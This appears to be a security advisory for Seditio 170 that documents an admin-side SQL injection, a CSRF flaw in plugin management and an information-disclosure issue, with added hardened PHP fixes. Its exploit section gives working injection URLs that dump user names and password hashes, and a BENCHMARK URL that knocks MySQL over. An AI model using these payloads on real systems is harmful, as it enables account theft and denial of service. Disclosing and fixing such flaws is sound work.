============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from: http://www.neocrome.net/files/code/seditio-build170.20120302.rar
(MD5 SUM: beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
php.ini: magic_quotes_gpc = Off
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
===========================================================
Vulnerability Description:
Seditio 170 (seditio-build170.20120302) is prone to an SQL injection vulnerability.
Note: Successful exploitation requires administrative authentication to the system.
//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');   // 'f' is read from $_GET as free text
$v = sed_import('v','G','TXT');   // 'v' is read from $_GET as free text; with magic_quotes_gpc off a single quote reaches the query intact
if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
// $v is concatenated straight into the LIKE string literal: a quote in $v closes the literal and the remainder is executed as SQL
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");
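A hardened form of the handler above, added here as an example; it is not Seditio's own code. It assumes PHP 7.1+ with PDO, a stats table named sed170_stats (constructed for the demonstration; in the application the name comes from $db_stats in its own config, never from the request), and that stat_name values look like YYYY or YYYY-MM, which is an assumption about the data format to be adjusted to the real rows. The value of v is validated and then bound as a parameter, so a quote in it can no longer terminate the literal, and driver errors are logged rather than echoed to the page:

```php
<?php
// Added example, not Seditio's own code: a hardened replacement for the
// query in admin.hits.inc.php. The stat_name format (YYYY / YYYY-MM) is an
// assumption made for this example; adjust the patterns to the real data.
declare(strict_types=1);

// Whitelist of filter kinds, each with the shape its value must have.
const HITS_FILTERS = [
    'year'  => '/^\d{4}$/',        // e.g. 2012
    'month' => '/^\d{4}-\d{2}$/',  // e.g. 2012-03
];

/**
 * Returns the matching stats rows, or null when the request is rejected.
 * $dbStats is the table name from the application's own config; it is still
 * checked as an identifier because identifiers cannot be bound as parameters.
 */
function hits_by_prefix(PDO $pdo, string $dbStats, array $get): ?array
{
    // 1. Whitelist the filter kind instead of comparing free text.
    $f = $get['f'] ?? '';
    if (!is_string($f) || !isset(HITS_FILTERS[$f])) {
        return null;
    }
    // 2. Validate the value against the shape the filter expects.
    $v = $get['v'] ?? '';
    if (!is_string($v) || !preg_match(HITS_FILTERS[$f], $v)) {
        return null;
    }
    // 3. Identifier guard for the table name (defence in depth).
    if (!preg_match('/^[A-Za-z0-9_]+$/', $dbStats)) {
        throw new InvalidArgumentException('invalid stats table name');
    }
    // 4. Bind the value: a quote in $v can no longer terminate the literal.
    //    LIKE metacharacters are escaped with '!' so they match literally.
    $prefix = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $v) . '%';
    $stmt = $pdo->prepare(
        "SELECT * FROM `$dbStats` WHERE stat_name LIKE :prefix ESCAPE '!' ORDER BY stat_name DESC"
    );
    $stmt->bindValue(':prefix', $prefix, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Stand-alone demonstration on a constructed in-memory SQLite table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE sed170_stats (stat_name TEXT, stat_value INTEGER)');
$pdo->exec("INSERT INTO sed170_stats VALUES ('2012-03', 41), ('2012-02', 17), ('2011-12', 9)");

try {
    // Legitimate request: both 2012 rows come back.
    $rows = hits_by_prefix($pdo, 'sed170_stats', ['f' => 'year', 'v' => '2012']);
    var_dump(count($rows));
    // The injected value from the advisory is rejected before any SQL runs (null).
    $rows = hits_by_prefix($pdo, 'sed170_stats', ['f' => 'year', 'v' => "1' union select 1,user_name from sed170_users--"]);
    var_dump($rows);
} catch (PDOException $e) {
    // Log the driver message server-side; never echo it into the page.
    error_log('hits query failed: ' . $e->getMessage());
}
```

The same catch-and-log pattern addresses the information disclosure noted later in this advisory: with display_errors off and exceptions logged instead of printed, over-long input can no longer surface column names to the browser.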
Exploit:
Extract user/admin/moderator details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--
Overload the MySQL server (the MySQL server goes down under high CPU load; in other words, a denial of service through SQL injection):
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be combined with CSRF, especially if you have no access to the system as admin.
For example, print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png
Seditio 170 (seditio-build170.20120302) is also prone to a CSRF (Cross-Site Request Forgery)
vulnerability because it does not check request validity for $_GET requests;
as a result, plugins can be silently uninstalled/stopped/paused/started, which may cause
data loss or functionality loss.
===========================================================================================
/* Tested with Seditio 165 and seditio-build170.20120302: [Uninstall Plugins] CSRF exploit. */
//Works for me.
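The check the advisory says is missing, added here as an example and not Seditio's own code: state-changing plugin actions are only accepted over POST and only with a per-session token compared in constant time. It assumes PHP 7.0+ (random_bytes, hash_equals); the function names, the plugin list and the session array are hypothetical and constructed for the demonstration:

```php
<?php
// Added example, not Seditio's own code: CSRF protection for state-changing
// admin actions such as plugin uninstall/stop/pause/start. Function and
// parameter names are hypothetical.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

// Issue one random token per session; embed it in admin forms as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Validate a request that changes state. True only for a POST whose token
// equals the session's token; a crafted GET link never passes.
function csrf_check(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given = $post[CSRF_SESSION_KEY] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);  // constant-time comparison
}

// Hypothetical plugin action dispatcher: the action runs only after the check.
// Returns the HTTP status to send and the (possibly updated) plugin list.
function handle_plugin_action(array $session, string $method, array $post, array $plugins): array
{
    if (!csrf_check($session, $method, $post)) {
        return ['status' => 403, 'plugins' => $plugins];
    }
    $name = $post['plugin'] ?? '';
    $action = $post['action'] ?? '';
    $allowed = ['start' => 'running', 'pause' => 'paused', 'stop' => 'stopped', 'uninstall' => null];
    if (!isset($plugins[$name]) || !array_key_exists($action, $allowed)) {
        return ['status' => 400, 'plugins' => $plugins];
    }
    if ($action === 'uninstall') {
        unset($plugins[$name]);
    } else {
        $plugins[$name] = $allowed[$action];
    }
    return ['status' => 200, 'plugins' => $plugins];
}

// Demonstration with a constructed session and plugin list.
$session = [];
$plugins = ['comments' => 'running', 'polls' => 'running'];
$token = csrf_token($session);

// A link the admin is tricked into following (GET, no token): refused, list unchanged.
$r = handle_plugin_action($session, 'GET', ['plugin' => 'polls', 'action' => 'uninstall'], $plugins);
echo $r['status'], ' ', implode(',', array_keys($r['plugins'])), PHP_EOL;

// The admin's own form submission carrying the token: accepted, plugin removed.
$r = handle_plugin_action($session, 'POST', ['plugin' => 'polls', 'action' => 'uninstall', CSRF_SESSION_KEY => $token], $plugins);
echo $r['status'], ' ', implode(',', array_keys($r['plugins'])), PHP_EOL;
```

In a deployment $session is $_SESSION, the token is rendered into a hidden field of every admin form, and the GET links that currently trigger plugin actions are replaced by POST forms; marking the session cookie SameSite further limits what a cross-site page can send.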
==============================================================================================
Information Disclosure:
Post a very long string into the inputs.
The application will expose column names, which is no longer acceptable from a security standpoint.
For example:
Client-side validation: